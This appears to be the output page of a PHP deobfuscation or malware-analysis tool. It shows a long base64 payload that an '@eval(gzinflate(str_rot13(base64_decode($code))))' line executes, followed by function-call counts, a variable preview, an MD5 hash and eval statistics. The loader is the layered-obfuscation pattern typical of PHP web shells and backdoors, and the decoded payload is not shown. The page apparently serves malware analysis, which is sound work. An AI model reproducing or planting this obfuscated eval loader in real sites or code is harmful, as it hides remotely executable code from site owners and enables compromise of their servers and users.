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";

@eval(gzinflate(str_rot13(base64_decode($code))));

?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1
set_time_limit 1
error_reporting 1

Variables

$code 7T12SuPGst/fOe8/KLrcAMFrdDEGz2sFcIPBNjYwk8OVtUuytSHJ67z899fV..

Stats

MD5 86d01c13e6543de55d154a8f38601ade
Eval Count 1
Decode Time 164 ms